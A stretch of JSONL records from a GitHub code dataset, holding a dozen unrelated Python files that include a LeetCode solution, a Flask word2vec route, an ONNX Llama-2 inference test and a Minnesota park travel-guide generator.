.where(indicator_table.c.strategy_id == strategy_id)\n .values(status=new_status.value)\n )\n success = await write_db(database, query)\n if not success:\n logging.error(f\"Update Indicator Status By Strategy ID : Write DB Failure\")\n return success\n\n\nasync def update_indicator_status_by_definition_id(\n database: Database, definition_id: int, new_status: BottifyStatus\n):\n if not isinstance(new_status, BottifyStatus):\n logging.error(\n f\"Update Indicator Status By Definition ID : New Status Must be Type BottifyStatus - Got: {type(new_status)}\"\n )\n query = (\n indicator_table.update()\n .where(indicator_table.c.definition_id == definition_id)\n .values(status=new_status.value)\n )\n success = await write_db(database, query)\n if not success:\n logging.error(f\"Update Indicator Status By Definition ID : Write DB Failure\")\n return success\n","repo_name":"Kroonjay/Bottify","sub_path":"core/database/crud/indicator.py","file_name":"indicator.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36127005246","text":"import re\nfrom ftrace.common import ParserError\nfrom .register import register_parser\nfrom .binder import parse_binder_cmd\nfrom collections import namedtuple\n\nTRACEPOINT = 'binder_update_page_range'\n\n__all__ = [TRACEPOINT]\n\n#binder_update_page_range: proc=3624 allocate=1 offset=4096 size=8192\n\nBinderUpdatePageRangeBase = namedtuple(TRACEPOINT,\n [\n 'proc',\n 'allocate',\n 'offset',\n 'size'\n ]\n)\n\nclass BinderUpdatePageRange(BinderUpdatePageRangeBase):\n __slots__ = ()\n def __new__(cls, proc, allocate, offset, size):\n\n return super(cls, BinderUpdatePageRange).__new__(\n cls,\n proc=proc,\n allocate=allocate,\n offset=offset,\n size=size\n )\n\nbinder_update_page_range_pattern = re.compile(\n r\"\"\"\n proc=(\\d+)\\s+\n allocate=(\\d+)\\s+\n offset=(\\d+)\\s+\n size=(\\d+)\n \"\"\",\n re.X|re.M\n)\n\n@register_parser\ndef binder_update_page_range(payload):\n \"\"\"Parser for `binder_update_page_range`\"\"\"\n try:\n match = re.match(binder_update_page_range_pattern, payload)\n if match:\n match_group_dict = match.groupdict()\n return BinderUpdatePageRange(int(match.group(1)), int(match.group(2)), int(match.group(3)), int(match.group(4)))\n except Exception as e:\n raise ParserError(e.message)\n","repo_name":"corakwue/ftrace","sub_path":"ftrace/parsers/binder_update_page_range.py","file_name":"binder_update_page_range.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"21451551585","text":"# -*- coding: utf-8 -*-\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def countNodes(self, root):\n \"\"\"\n Solution: BFS\n Time Complexity: O(n)\n Space Complexity: O(n)\n Perf: Runtime: 140 ms, faster than 9.88% / Memory Usage: 27.6 MB, less than 5.41%\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root: return 0\n stack = [root]\n count = 0\n while stack:\n r = stack.pop(0)\n count += 1\n if r.left:\n stack.append(r.left)\n if r.right:\n stack.append(r.right)\n return count","repo_name":"jerrt2003/leetcode-in-python","sub_path":"222_Count_Complete_Tree_Nodes/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40246608434","text":"from flask import Flask, request, render_template, redirect, Blueprint\nimport models as mo\nimport json\n\nbp = Blueprint('word', __name__, url_prefix='/word')\n\nreviewService = mo.ReviewService()\nmapService = mo.MapService()\n\n@bp.route('/main', methods=['POST', 'GET'])\ndef word_main():\n closeSiteList = mapService.getCloseSiteList()\n return render_template('word/main.html', closeSiteList=closeSiteList)\n\n@bp.route('/word_info', methods=['POST', 'GET'])\ndef word_info():\n searchWord = request.form['word']\n myWordList = reviewService.keword_similar(searchWord) #그래프와 리뷰 서비스 둘다에 필요한 기능이라\n reviewService.keyword_recommend(myWordList)\n myGraphVec = reviewService.keywordScatterGraph(myWordList, searchWord)\n\n # 이 벡터를 시각화할 수 있도록 PCA를 불러온다.\n # 원래는 차원이 매우 높아서 단어가 임베딩 공간을 차지하는 방식을 시각화하는 것이 불가능함.\n # PCA는 일반적으로 단어 임베딩의 차원을 줄여서 시각화하는 역할.\n from sklearn.decomposition import PCA\n pca = PCA(n_components=2) # 2D로 시각화\n xy_axis = pca.fit_transform(myGraphVec) # 단어 임베딩 차원(단어갯수만큼존재할것임)을 2개(x축,y축)로 만들어줌.\n x_axis = xy_axis[:, 0] # x축\n y_axis = xy_axis[:, 1] # y축\n\n import matplotlib.pyplot as plt\n # 한글 폰트 사용을 위해서 세팅\n from matplotlib import font_manager, rc\n font_path = \"C:/Windows/Fonts/H2GTRM.TTF\" # 한글고딕\n font = font_manager.FontProperties(fname=font_path).get_name()\n rc('font', family=font) # 한글폰트 설정\n\n import plotly # plotly, 다른 그래프 라이브러리보다 예쁨.\n import plotly.graph_objects as go\n\n fig = go.Figure(data=go.Scatter(x=x_axis, # x축\n y=y_axis, # y축\n mode='markers+text',\n text=myWordList))\n\n fig.update_layout(title=f'Word Trip {searchWord} Word2Vec')\n\n import plotly.io as pio # 입출력 라이브러리\n\n graph = pio.to_json(fig) #그래프를 json형태로 만듬.\n graph = graph.encode('utf-8') # 한글 인코딩 한글->숫자\n graph = graph.decode('unicode_escape') #다시 한글로 디코딩\n\n # json을 html로 뿌릴 때 필요\n graphJSON = json.dumps(graph, ensure_ascii=False , cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('word/wordInfo.html', graphJSON=graphJSON)\n\n@bp.route('/detail/', methods=['POST', 'GET']) #\ndef detail(guname):\n a = guname\n b = reviewService.mapReview(a)\n return render_template('word/wordInfo.html', b=b, guname=guname)\n\n@bp.route('/detail/detail/', methods=['POST', 'GET']) #'/attraction/detail/3'\ndef get(place_name):\n p = reviewService.getAttrByName(place_name)\n r = reviewService.getAttrByReview(place_name)\n return render_template('word/detail.html', p=p, r=r)","repo_name":"crystal993/Word_trip","sub_path":"final_travel_project/route_update/word_route.py","file_name":"word_route.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27832231581","text":"import argparse\nimport os\nimport pprint\nimport sys\nfrom pathlib import Path\n\nimport onnxruntime\nimport torch\nfrom transformers import LlamaConfig, LlamaForCausalLM, LlamaTokenizer\n\n\ndef _run_pytorch(model, inputs):\n return model(**inputs)\n\n\ndef _mpipool_worker(args):\n filepath, local_rank, world_size, inputs = args\n\n os.environ[\"OMPI_COMM_WORLD_RANK\"] = str(local_rank)\n os.environ[\"OMPI_COMM_WORLD_SIZE\"] = str(world_size)\n\n from mpi4py.MPI import COMM_WORLD\n\n local_rank = COMM_WORLD.Get_rank()\n COMM_WORLD.barrier()\n\n print(f\"rank: {local_rank}, filepath: {filepath}\")\n\n session = onnxruntime.InferenceSession(\n filepath,\n providers=[\"CUDAExecutionProvider\"],\n provider_options=[{\"device_id\": str(local_rank)}],\n )\n return session.run(None, inputs)[0]\n\n\ndef _run_onnx(filepath, world_size, inputs):\n from mpi4py.futures import MPIPoolExecutor\n from mpi4py.MPI import COMM_WORLD\n\n args = [(filepath.format(rank), rank, world_size, inputs) for rank in range(world_size)]\n with MPIPoolExecutor(max_workers=world_size) as executor:\n outputs = executor.map(_mpipool_worker, args)\n executor.shutdown()\n\n COMM_WORLD.barrier()\n\n return list(outputs)\n\n\ndef _main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--filename-pattern\",\n dest=\"filename_pattern\",\n type=str,\n help=\"Onnx model file name pattern to use for distributed run\",\n )\n parser.add_argument(\"--world-size\", dest=\"world_size\", type=int, help=\"World size for distributed run\")\n parser.add_argument(\n \"--compare\",\n dest=\"compare\",\n action=\"store_true\",\n default=False,\n help=\"Compare results from distributed session to non-distributed session\",\n )\n parser.add_argument(\"--debug\", action=\"store_true\", default=False, help=\"Enable debug output\")\n args = parser.parse_args()\n\n model_id = \"meta-llama/Llama-2-7b-hf\"\n prompt = \"Is it normal to have a dark ring around the iris of my eye?\"\n device = \"cuda\"\n\n tokenizer = LlamaTokenizer.from_pretrained(model_id)\n tokens = tokenizer(prompt, return_tensors=\"pt\")\n tokenizer = None\n\n config = LlamaConfig.from_pretrained(model_id)\n num_heads, head_size = config.num_key_value_heads, config.hidden_size // config.num_key_value_heads\n batch_size, past_seq_len = 2, 0\n\n model = LlamaForCausalLM.from_pretrained(model_id, torch_dtype=config.torch_dtype, config=config)\n model.to(device)\n model.eval()\n model.requires_grad_(False)\n\n position_ids = tokens.attention_mask.long().cumsum(-1) - 1\n position_ids.masked_fill_(tokens.attention_mask == 0, 1)\n\n pytorch_inputs = {\n \"input_ids\": tokens.input_ids.to(device),\n \"attention_mask\": tokens.attention_mask.to(device),\n \"position_ids\": position_ids.to(device),\n }\n pytorch_outputs = _run_pytorch(model, pytorch_inputs)\n\n if args.debug:\n with (Path.cwd() / \"pytorch_output.txt\").open(\"wt\") as strm:\n pprint.pprint(pytorch_outputs, stream=strm)\n strm.flush()\n\n onnx_inputs = {\n \"input_ids\": tokens.input_ids.numpy(),\n \"attention_mask\": tokens.attention_mask.numpy(),\n \"position_ids\": position_ids.numpy(),\n }\n for i in range(config.num_hidden_layers):\n onnx_inputs[f\"past_key_values.{i}.key\"] = torch.rand(\n batch_size, num_heads, past_seq_len, head_size, dtype=torch.float32\n ).numpy()\n onnx_inputs[f\"past_key_values.{i}.value\"] = torch.rand(\n batch_size, num_heads, past_seq_len, head_size, dtype=torch.float32\n ).numpy()\n\n onnx_outputs = _run_onnx(args.filename_pattern, args.world_size, onnx_inputs)\n\n if args.debug:\n with (Path.cwd() / \"onnx_output.txt\").open(\"wt\") as strm:\n pprint.pprint(onnx_outputs, stream=strm)\n strm.flush()\n\n if args.compare and (pytorch_outputs is not None) and (onnx_outputs is not None):\n import numpy as np\n\n pytorch_outputs = pytorch_outputs[\"logits\"].cpu().numpy()\n\n results = {}\n for i in range(args.world_size):\n results[f\"pytorch vs. onnx_{i:02d}\"] = np.fabs(np.median(pytorch_outputs - onnx_outputs[i]))\n\n if i > 0:\n results[f\"onnx_00 vs. onnx_{i:02d}\"] = np.fabs(np.median(onnx_outputs[0] - onnx_outputs[i]))\n\n if args.debug:\n pprint.pprint(results)\n\n atol = 1e-4\n if not np.all(np.array(list(results.values())) < atol):\n raise RuntimeError(\"Inference test failed!\")\n\n print(\"Inference test completed successfully!\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(_main())\n\n\n# python3 inference.py \\\n# --filename-pattern model_{:02d}.onnx \\\n# --world-size 2\n# [--debug]\n#\n# python3 inference.py \\\n# --filename-pattern model_{:02d}.onnx \\\n# --world-size 2 \\\n# [--compare] \\\n# [--debug]\n","repo_name":"Physolia/OLive","sub_path":"examples/llama2/tensor_parallel_inference.py","file_name":"tensor_parallel_inference.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74413001768","text":"import sqlite3\n\n# Conexión a la base de datos (se creará si no existe)\nconn = sqlite3.connect(\"prueba.db\")\n\n# Crear un cursor para interacturar con la base de datos\ncursor = conn.cursor()\n\n# Crear una tabla llamada usuarios con tres columnas: id, nombre y edad\ncursor.execute('''CREATE TABLE IF NOT EXISTS usuarios (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre TEXT NOT NULL,\n edad INTEGER\n )''')\n\n# Guardar los cambios y cerrar la conexión\nconn.commit()\nconn.close()\n\nconn = sqlite3.connect(\"prueba.db\")\n\ncursor = conn.cursor()\n\ncursor.execute(\"INSERT INTO usuarios (nombre, edad) VALUES (?, ?)\", (\"Juan\", 21))\n\nconn.commit()\nconn.close()\n\n","repo_name":"JezrrelValles/Aprendiendo-Python-3-Nivel-Intermedio","sub_path":"api/base_datos_prueba.py","file_name":"base_datos_prueba.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18984065752","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 11 16:56:50 2020\r\n\r\n@author: penghui\r\n\"\"\"\r\nimport pyautogui as pi\r\n#import time\r\nimport pyperclip as pp\r\nfrom os import getcwd\r\nname = pi.prompt(title='请输入txt名字(在浏览器界面下填写并点击确定)')\r\nname_txt = 'url_'+name\r\n#time.sleep(2)\r\ni = 1\r\nsite_list = []\r\nwhile(i>0):\r\n pi.moveTo(600,50,2)\r\n #time.sleep(3)\r\n pi.click(button='left')\r\n pi.hotkey('ctrl', 'a')\r\n pi.hotkey('ctrl','c')\r\n #获取粘贴板内容\r\n site = pp.paste()\r\n print(site)\r\n if site in site_list:\r\n break\r\n else:\r\n site_list.append(site)\r\n #切换tab\r\n pi.hotkey('ctrl', 'PgDn')\r\n#写入到txt\r\n#name = 'openurl'+time.strftime(\"%m{m}%d{d}%H:%M:%S\", time.localtime()).format(m='月',d='日')\r\n\r\ndirurl = getcwd()+'/url_'+name+'.txt'\r\nf = open(dirurl,'w')#a\r\nsite_list_len = len(site_list)\r\nfor item in site_list:\r\n f.write(item+'\\n')\r\n#一定不能忘记\r\nf.close()\r\npi.alert(\"已经将当前窗口的\"+str(site_list_len)+\"个标签页写入到\"+name_txt+\".txt\")\r\n#","repo_name":"slowlyideal/Selenium","sub_path":"网址的自动保存与打开/saveurl.py","file_name":"saveurl.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8135820309","text":"import numpy as np\nfrom read_data import read_trips\nimport sys\nimport scipy as sp\nfrom scipy.signal import savgol_filter\n\ndef smooth_low(arr):\n arr = np.array(arr, copy=True)\n for i, a in enumerate(arr):\n if np.dot(a, a) < 1:\n arr[i] = np.array([0, 0])\n return arr\n\ndef smooth(arr, n=75):\n xs = arr[:,0]\n ys = arr[:,1]\n xdft = np.fft.rfft(xs)\n ydft = np.fft.rfft(ys)\n xdft[n:] = [0]\n ydft[n:] = [0]\n xsm = np.fft.irfft(xdft)\n ysm = np.fft.irfft(ydft)\n return np.vstack((xsm, ysm)).T\n\ndef smooth2(arr):\n xf = savgol_filter(arr[:,0], 5, 2)\n yf = savgol_filter(arr[:,1], 5, 2)\n return np.vstack((xf, yf)).T\n\n\ndef grad2d(arr):\n return np.vstack((np.gradient(arr[:,0]), np.gradient(arr[:,1]))).T\n\ndef compute_scalar(a):\n a_complex = a[:,0] + a[:,1]*1j\n return np.absolute(a_complex)\n\ndef compute_velocity(position):\n jag_velocity = grad2d(position)\n #velocity = smooth_low(smooth(jag_velocity))\n velocity = smooth2(jag_velocity)\n return velocity\n\ndef compute_acceleration(velocity):\n return grad2d(velocity)\n\ndef n_step_diff(arr, n=2):\n res = np.zeros(arr.shape)\n for i, a in enumerate(arr):\n j = i - n\n res[i] = a - arr[max(j, 0)]\n return res\n \ndef acceleration_features(velocity, angle_dt, cos_dt, speed=None):\n if speed is None:\n speed = compute_scalar(velocity)\n\n avg_speed = np.mean(speed)\n max_speed = np.max(speed)\n min_speed = np.min(speed)\n total_time = float(len(speed))\n four_speed = (speed[0:4:-4] + speed[1:4:-3] + speed[2:4:-2] + speed[3:4:-1])/4\n\n fast_speed = 25\n slow_speed = 4\n \n fast = speed > fast_speed\n time_fast = np.sum(fast)\n slow = speed < slow_speed\n time_slow = np.sum(slow)\n\n n_bins = 100 \n speed_bins = np.hstack((np.linspace(0, 40, n_bins), np.inf))\n speed_hist, outside = np.histogram(speed, bins=speed_bins)\n n_speed_hist = speed_hist/total_time\n\n four_speed_bins = np.hstack((np.linspace(0, 40, n_bins), np.inf))\n four_speed_hist, outside = np.histogram(four_speed, bins=four_speed_bins)\n n_four_speed_hist = four_speed_hist/total_time\n \n fraction_fast = time_fast/total_time\n fraction_slow = time_slow/total_time\n\n stationary = speed < 0.5\n stops = np.sum(stationary)\n fraction_stationary = stops/total_time\n\n acc_bins = np.hstack((-np.inf, np.linspace(-10, 10, n_bins), np.inf))\n scalar_acc = np.gradient(speed)\n acc_hist, bins = np.histogram(scalar_acc, bins=acc_bins)\n n_acc_hist = acc_hist/total_time\n\n acc2_bins = np.hstack((-np.inf, np.linspace(-5, 5, n_bins), np.inf))\n scalar_acc2 = np.gradient(scalar_acc)\n acc2_hist, bins = np.histogram(scalar_acc2, bins=acc2_bins)\n n_acc2_hist = acc2_hist/total_time\n\n angle_dt_speed = speed * angle_dt\n angle_bins = np.hstack((-np.inf, np.linspace(-50, 50, n_bins), np.inf))\n angle_hist, b = np.histogram(angle_dt_speed, bins=angle_bins)\n n_angle_hist = angle_hist/total_time\n\n angle_dt_acc = scalar_acc*angle_dt\n angle_bins = np.hstack((-np.inf, np.linspace(-50, 50, n_bins), np.inf))\n acc_angle_hist, b = np.histogram(angle_dt_acc, bins=angle_bins)\n n_acc_angle_hist = acc_angle_hist/total_time\n\n cos_dt_speed = speed * cos_dt\n cos_bins = np.hstack((-np.inf, np.linspace(0, 40, n_bins), np.inf))\n cos_hist, b = np.histogram(cos_dt_speed, bins=cos_bins)\n n_cos_hist = cos_hist/total_time\n\n max_acc = np.max(scalar_acc)\n avg_acc = np.mean(scalar_acc * (scalar_acc > 0))\n max_dec = np.max(np.abs(scalar_acc * (scalar_acc < 0)))\n avg_dec = np.mean(np.abs(scalar_acc * (scalar_acc < 0)))\n feats1 = np.array([total_time, \n time_fast,\n time_slow,\n fraction_fast,\n fraction_slow,\n stops,\n fraction_stationary])\n #return np.hstack((feats1, n_speed_hist, n_angle_hist, n_cos_hist, n_acc_angle_hist))\n return np.hstack((feats1, n_speed_hist, n_angle_hist, n_acc_hist, n_acc2_hist, n_cos_hist, n_acc_angle_hist))\n\ndef main():\n trips = read_trips(sys.argv[1])\n velocities = [compute_velocity(trip) for trip in trips]\n speeds = [compute_scalar(v) for v in velocities]\n features = np.array([acceleration_features(speed) for speed in speeds])\n print(features)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"smoussa/seahorse-ml","sub_path":"feature_extraction/acceleration_features.py","file_name":"acceleration_features.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42390428252","text":"import csv\nimport requests\n\ndef get_data(url=None,file_path = None):\n CSV_URL = url\n with requests.Session() as s:\n download = s.get(CSV_URL)\n\n decoded_content = download.content.decode('utf-8')\n\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n my_list = list(cr)\n\n with open(file_path,'w', newline='') as file:\n writer = csv.writer(file)\n for row in my_list:\n writer.writerow(row)\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us-counties.csv', file_path='us-counties-refactored.csv')\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us-states.csv',file_path='us-states-refactored.csv')\n\nget_data(url='https://raw.githubusercontent.com/nytimes/covid-19-data/master/live/us.csv',file_path='us-refactored.csv')","repo_name":"JustCasuallyJames/Covid-Tracker","sub_path":"scripts/data_scrapper.py","file_name":"data_scrapper.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19951389691","text":"\n\"\"\"\nCreated on Thu Jul 16 11:15:06 2015\n\n@author: Antoine\n\"\"\"\n\nimport os\n\n\ndef file_infos(excelfile_name):\n filename = os.path.split(excelfile_name)[1].split('.')[0] # name of the file, without extension\n filename = filename.lower()\n file_version = os.path.dirname(excelfile_name)\n file_version = file_version[-4:]\n file_source = 'INSEE Comptabilite Nationale'\n file_source_link = 'http://www.insee.fr/fr/indicateurs/cnat_annu/archives/comptes_annee_{}.zip'.format(file_version)\n\n skip = 0\n\n # TEE (tableau economique d'ensemble) file\n if filename.startswith('tee'):\n year = str(filename[-4:])\n agent = 'economie'\n title = 'TEE'\n tee_flag = 1 # 'tee'\n\n # Non TEE file\n else:\n year = ''\n agent = ''\n title = ''\n tee_flag = 0 # 'not tee'\n\n # could be automatized (in the parser method by reading the first cell and cutting in 3: name of file, title, agent)\n if filename == 't_7101':\n agent = 'S11' # (societes non financieres)\n title = 'Compte des societes non financieres'\n elif filename == 't_7201':\n agent = 'S12' # (societes financieres)\n title = 'Compte des societes financieres'\n elif filename == 't_7301':\n agent = 'S13' # (administrations publiques)\n title = 'Compte des administrations publiques'\n elif filename == 't_7401':\n agent = 'S14' # (menages)\n title = 'Compte des menages'\n elif filename == 't_7501':\n agent = 'S15' # (isbl)\n title = 'Compte des institutions sans but lucratif au service des menages'\n elif filename == 't_7601':\n agent = 'S2' # (reste du monde)\n title = 'Operations avec le reste du monde'\n elif filename == 't_1115':\n agent = 'S1'\n title = 'Produit intérieur brut et revenu national brut par habitant'\n\n # to be completed for all the files of interest in the folder\n # elif filename == 't_3101':\n # agent = 'S13' # (administrations publiques)\n # title = 'Dette des administrations publiques (S13) au sens de Maastricht et sa répartition par sous-secteur'\n # elif filename == 't_3201':\n # agent = 'S13' # (administrations publiques)\n # title = 'Dette et recettes des administrations publiques'\n\n else:\n skip = 1\n\n if skip == 0:\n parameters = dict()\n parameters = {'agent': agent, 'title': title, 'year': year, 'filename': filename,\n 'tee_flag': tee_flag, 'source': file_source, 'link': file_source_link, 'version': file_version}\n else:\n parameters = False\n\n return parameters\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/comptes_nationaux/get_file_infos.py","file_name":"get_file_infos.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24167978100","text":"from datetime import datetime\n\n\ndef get_timestamp():\n return datetime.now().strftime((\"%Y-%m-%d %H:%M:%S\"))\n\n\n# Data to serve with our API\nCOUNTRY = {\n \"Norway\": {\n \"name\": \"Norway\",\n \"chapters_involved\": [],\n \"chapters_not_involved\": [],\n \"treaties_involved\": [],\n \"treaties_not_involved\": [],\n \"timestamp\": get_timestamp(),\n \"date_first_appearance\": \"\",\n \"text\": \"\",\n },\n \"Sweden\": {\n \"name\": \"Sweden\",\n \"chapters_involved\": [],\n \"chapters_not_involved\": [],\n \"treaties_involved\": [],\n \"treaties_not_involved\": [],\n \"timestamp\": get_timestamp(),\n \"date_first_appearance\": \"\",\n \"text\": \"\",\n },\n}\n\n# Create a handler for our read (GET) COUNTRY\ndef read():\n \"\"\"\n This function responds to a request for /api/COUNTRY\n with the complete lists of COUNTRY\n\n :return: sorted list of COUNTRY\n \"\"\"\n # Create the list of COUNTRY from our data\n return [COUNTRY[key] for key in sorted(COUNTRY.keys())]\n","repo_name":"DataForGood-Norway/un_treaties","sub_path":"un_treaties/rest_api/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27186085510","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nN = int(input())\nD = input().split(\" \")\nM = int(input())\nT = input().split(\" \")\n\n\nif len(D) < len(T):\n\tprint(\"NO\")\n\texit(0)\n\nD.sort()\nT.sort()\n\ni = 0\nj = 0\n\nwhile True:\n\tif i > M-1:\n\t\tprint(\"YES\")\n\t\tbreak\n\n\telif D[j] == T[i] :\n\t\ti += 1\n\t\tj += 1\n\n\telse:\n\t\tj += 1\n\n\t\tif j > N - 1:\n\t\t\tprint(\"NO\")\n\t\t\tbreak\n\n\t\telif D[j] > T[i]:\n\t\t\tprint(\"NO\")\n\t\t\tbreak\n\n\n\n\n\n","repo_name":"banboooo044/AtCoder","sub_path":"DDCC_2017/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898622468","text":"#Leetcode 5\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n result = \"\"\n result_length = 0\n #algo: Two ways:\n # 1. check first and last char, and move inwards\n # 2. select a middle, and check chars on both sides of middle, and move outwards\n # Here I am using the second algo\n for i in range(len(s)):\n \n #For even length string\n l,r=i,i+1\n while l >=0 and r < len(s) and s[l] == s[r]:\n if (r-l+1) > result_length:\n result = s[l:r+1]\n result_length = (r-l+1)\n l -= 1 #going outwards\n r += 1 \n\n #For odd length string\n l,r = i,i\n while l >=0 and r < len(s) and s[l] == s[r]:\n if (r-l+1) > result_length:\n result = s[l:r+1]\n result_length = (r-l+1)\n l -= 1 #going outwards\n r += 1\n return result\n \n #Time = O(n^2)\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"strings/LongestPaliandromicSubstring.py","file_name":"LongestPaliandromicSubstring.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37728198266","text":"# Code/logic adapted from Professor Clara James, Information Technology 1150: Programming and Logic / Al Sweigart,\n# Automate the Boring Stuff With Python.\n\"\"\"\nThis program will fetch and arrange data from the Minnesota State Park API server,\nformat and save park info in a Word document and create a travel guide.\nAlternatively produces a sample guide if network or server connection is unavailable.\n\"\"\"\nimport requests\nimport docx\nfrom docx import Document\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\nimport random\nimport plotly.graph_objects as go\nimport plotly.express as px\n\ndocument = docx.Document()\n\n\ndef main():\n \"\"\"Outline data structure and save final document. \"\"\"\n document.add_paragraph('Minnesota State Park Travel Guide', 'Title')\n\n response = master_park_data()\n park_dict = {}\n for mn_state_park in response:\n park_names_key = mn_state_park['name']\n park_id_value = mn_state_park['park_id']\n park_dict[park_names_key] = park_id_value\n park_ids_list = list(park_dict.values())\n\n number_of_parks = 5 # Guide should contain at least 5 parks\n random_park_id_selection = choose_rand_park(number_of_parks, park_ids_list)\n for park_id in random_park_id_selection:\n each_park = detailed_park_data(park_id)\n park_name = each_park['name']\n park_images = each_park['park_images']\n download_images(park_images, park_name)\n\n park_title_and_header_img(each_park)\n park_text_info(each_park)\n park_gallery(each_park)\n contact_information(each_park)\n open_street_park_map(each_park)\n document.add_paragraph()\n\n document.save('Minnesota_State_Park_Travel_Guide_Final.docx')\n\n\ndef master_park_data():\n \"\"\"Attempt connection to the server and request master list of parks\n and their IDs. \"\"\"\n api_mn_state_parks = 'https://mn-state-parks.herokuapp.com/api/list'\n try:\n data = requests.get(api_mn_state_parks).json()\n return data\n except:\n print('There was an error requesting park data. Check network connection.')\n\n\ndef detailed_park_data(park_id):\n \"\"\"Request detailed information for each park. \"\"\"\n api_park_detail = f'https://mn-state-parks.herokuapp.com/api/{park_id}'\n try:\n data = requests.get(api_park_detail).json()\n return data\n except:\n print('There was an error requesting park information. Check network '\n 'connection.')\n\n\ndef choose_rand_park(total_parks, park_ids_list):\n \"\"\"Use random module to choose parks from park list, return five random park IDs. \"\"\"\n random_park_id_selection = []\n while total_parks > 0:\n chosen_park = random.choice(park_ids_list)\n if chosen_park not in random_park_id_selection:\n random_park_id_selection.append(chosen_park)\n total_parks -= 1\n\n return random_park_id_selection\n\n\ndef park_title_and_header_img(park_details):\n \"\"\"Add park name and image header to document. \"\"\"\n park_name = park_details['name']\n document.add_paragraph(park_name, 'Heading 1')\n document.add_picture(f'{park_name}_0.jpg', width=docx.shared.Inches(6),\n height=docx.shared.Inches(2.49))\n\n\ndef park_text_info(park_details):\n \"\"\"Create main body of text in the document for given park IDs. \"\"\"\n\n highlights = park_details['highlights']\n document.add_paragraph('Highlights', 'Heading 2')\n for highlight in highlights:\n document.add_paragraph(highlight, 'List Bullet')\n\n park_information = park_details['park_information']\n for information_category, category_details in park_information.items():\n document.add_paragraph(f'{information_category}', 'Heading 2')\n document.add_paragraph(f'{category_details}', 'Normal')\n\n\ndef park_gallery(park_details):\n \"\"\"Add remaining images to the document. \"\"\"\n park_name = park_details['name']\n\n for index in range(6): # Max 6 additional images per park in guide\n document.add_picture(f'{park_name}_{index+1}.jpg',\n width=docx.shared.Inches(5.47),\n height=docx.shared.Inches(2.87))\n last_paragraph = document.paragraphs[-1]\n last_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n # Code to center align image in docx\n # https://stackoverflow.com/questions/26474551/python-docx-lib-center-align-image\n\n\ndef open_street_park_map(park_details):\n \"\"\"Request tile map using Mapbox open street map - does not require access token.\n Downloads image and adds map to travel guide. \"\"\"\n park_name = park_details['name']\n lat = park_details['location']['latitude']\n lon = park_details['location']['longitude']\n\n fig = px.scatter_mapbox(\n lat=[lat],\n lon=[lon],\n color_discrete_sequence=[\"darkviolet\"],\n zoom=4.1,\n width=420,\n height=300\n )\n fig.update_traces(marker=dict(size=9),\n selector=dict(mode='markers'))\n fig.update_layout(mapbox_style=\"open-street-map\")\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n fig.write_image(f'{park_name}_map.png')\n\n document.add_paragraph('Map', 'Heading 2')\n document.add_picture(f'{park_name}_map.png')\n last_paragraph = document.paragraphs[-1]\n last_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n\ndef contact_information(park_details):\n \"\"\"Add contact information text to the document. \"\"\"\n document.add_paragraph('Contact Information', 'Heading 2')\n\n document.add_paragraph('Address', 'Heading 3')\n document.add_paragraph(park_details['address'], 'Normal')\n\n document.add_paragraph('Website', 'Heading 3')\n document.add_paragraph(park_details['url'], 'Normal')\n\n\ndef download_images(park_images, park_name):\n \"\"\"Take URLs from park dictionary and request, download, save and index images\n from MN park API server.\"\"\"\n for index, url in enumerate(park_images):\n chosen_img = requests.get(url)\n 